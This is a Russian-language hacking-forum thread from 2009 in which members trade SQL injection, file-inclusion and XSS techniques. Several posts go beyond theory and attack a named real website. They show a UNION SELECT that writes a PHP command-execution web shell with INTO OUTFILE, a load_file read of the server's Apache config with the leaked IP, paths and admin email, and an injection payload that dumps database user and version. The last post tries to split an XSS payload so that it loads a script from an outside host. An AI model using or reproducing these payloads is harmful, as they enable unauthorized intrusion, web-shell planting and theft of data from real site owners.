ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.12.2009, 12:44
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Сообщение от [R]eD
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например
PHP код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx. что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
Последний раз редактировалось [ DSU ]; 04.12.2009 в 12:47..
|
|
|
05.12.2009, 16:06
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от [ DSU ]
что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
Последний раз редактировалось [R]eD; 05.12.2009 в 16:09..
|
|
|
|
05.12.2009, 16:24
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от [R]eD
К сожалению mysql... Есть какие-нибудь другие способы вывести данные?)
почему к сожалению?
|
|
|
|
05.12.2009, 16:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от [R]eD
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например
Код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx. Очень просто, к примеру запрос:
Код:
...
mysql_query("UPDATE `news` SET `title` = '".$_POST['title']."', 'text' = '".$_POST['text']."' ");
...
При вводе
Title
Text:
запрос в БД будет
Код:
UPDATE `news` SET `title` = 'test title', `text` = 'test text'
Если же сделать такой ввод:
Title
Код:
test title', `text` = concat_ws(0x3a,user(),database(),version())/*
Text:
В БД пойдет запрос:
Код:
UPDATE `news` SET `title` = 'test title', `text` = concat_ws(0x3a,user(),database(),version())/*', `text` = 'test text'
И в тексте новости будет юзер, бд и версия.
PS: Это будет работать при magic_qoutes = Off.
|
|
|
|
04.12.2009, 16:53
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
коротко:
File_Priv: Y
magic_quotes_off
Сервер:Apache/2.2.3 (Red Hat)
проблема: немогу раскрыть путь...
конструкция:
http://www.gsmtrack.nl/index.php?page[]=
недала нефига(
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+'%3C?php%20system($_GET['cmd']);%20?%3E'+into+outfile+'/var/www/'--
тут понятно тоже што нефига невыйшло так как путь.....
вообщем вся загвоздка в том што немогу путь раскрыть и (или) загрузить конфиги хотябы)...
|
|
|
|
04.12.2009, 17:17
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
|
|
|
|
04.12.2009, 17:39
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Pashkela
Код:
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
прикол) я пробовал так...
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
и у меня нераскрылось) спасибо!
но к сожалению
/opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...
ты путь по конфигу вычислил?
|
|
|
|
04.12.2009, 18:38
|
|
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме:
484662
Репутация:
143
|
|
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
|
|
|
|
04.12.2009, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от schwarze
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
Если allow_url_include, то
Если нет, то
Или автарки форумов, и тд...
Об этом уже писалось тут...
|
|
|
|
05.12.2009, 00:02
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
Код:
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
Код:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ DSU ]](/avatars/avatar43637.jpg?1733218){kind=avatar}
![Отправить сообщение для [ DSU ] с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для [R]eD](/avatars/avatar26157.jpg?1735695){kind=avatar}
Похожие темы
Комбинированный вид